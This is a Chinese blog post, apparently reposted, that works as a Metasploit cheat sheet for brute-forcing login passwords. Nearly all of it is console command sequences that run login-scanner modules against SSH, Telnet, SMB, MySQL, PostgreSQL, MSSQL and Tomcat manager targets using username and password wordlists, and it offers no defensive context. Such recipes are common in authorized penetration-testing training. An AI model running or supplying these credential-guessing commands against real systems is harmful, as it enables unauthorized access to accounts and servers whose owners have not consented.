msf爆破

SSH服务口令猜解:

msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.1
msf auxiliary(ssh_login) > set USER_FILE /root/username.txt
msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt
msf auxiliary(ssh_login) > set THREADS 50
msf auxiliary(ssh_login) > exploit

Telnet口令猜解:
msf > use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > show options
msf auxiliary(telnet_login) > set RHOSTS 192.168.1.1
msf auxiliary(telnet_login) > set USER_FILE /root/username.txt
msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt
msf auxiliary(telnet_login) > exploit

Samba口令猜解:
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > show options
msf auxiliary(smb_login) > set RHOSTS 192.168.1.1
msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt
msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt
msf auxiliary(ssmb_login) > exploit

Mysql口令猜解:
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options
msf auxiliary(mysql_login) > set RHOSTS 192.168.1.1
msf auxiliary(mysql_login) > set USERNAME root
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt
msf auxiliary(mysql_login) > exploit

Postgresq口令猜解:
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
msf auxiliary(postgres_login) > set RHOSTS 192.168.1.1
msf auxiliary(postgres_login) > set USER_FILE /root/username.txt
msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt
msf auxiliary(postgres_login) > exploit

Mssql口令猜解:
msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > show options
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.1
msf auxiliary(mssql_login) > set USER_FILE /root/username.txt
msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt
msf auxiliary(mssql_login) > exploit

Tomcat口令猜解:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.1.1
msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt
msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt
msf auxiliary(tomcat_mgr_login) > exploit

转载于:https://www.cnblogs.com/Yang34/p/11407274.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值